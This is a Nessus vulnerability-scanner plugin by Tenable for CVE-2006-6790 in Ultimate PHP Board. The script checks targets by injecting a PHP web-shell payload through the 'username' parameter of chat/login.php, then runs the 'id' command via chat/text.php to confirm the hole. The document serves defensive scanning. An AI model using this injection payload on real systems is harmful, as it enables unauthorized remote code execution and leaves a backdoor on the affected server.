#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows injection of
arbitrary PHP code. 

Description :

The remote host is running Ultimate PHP Board (UPB). 

The version of UPB installed on the remote host does not sanitize
input to the 'username' parameter of the 'chat/login.php' script
before writing it to 'chat/text.php'.  Regardless of PHP's settings,
an attacker can leverage this flaw to inject arbitrary PHP code into
the second file and then retrieve that to have the code executed on
the affected host subject to the privileges of the web server user id. 

See also :

http://milw0rm.com/exploits/2999

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(23966);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2006-6790");
  script_bugtraq_id(21760);

  script_name(english:"Ultimate PHP Board username Parameter Arbitrary Command Execution Vulnerability");
  script_summary(english:"Tries to run a command with Ultimate PHP Board");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/upb", "/forums", "/forum", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Make sure the script exists.
  url = string(dir, "/chat/login.php?option=chat");
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does...
  if ('src="send.php?username="' >< res)
  {
    # Try to inject a command.
    cmd = "id";
    param = rand_str();
    user = "geo";

    exploit = string(user, ' <?php if (isset($_GET[', param, '])) {passthru($_GET[', param, ']); die;} ?>');
    req = http_get(
      item:string(
        url, "&",
        "username=", urlencode(str:exploit)
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # Check whether it worked.
    req = http_get(
      item:string(
        dir, "/chat/text.php?",
        param, "=", cmd
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
    if (line && user >< line)
    {
      line = strstr(line, user) - user;
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Nessus was able execute the command '", cmd, "' on the remote host;\n",
        "it produced the following output :\n",
        "\n",
        "  ", line
      );
      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
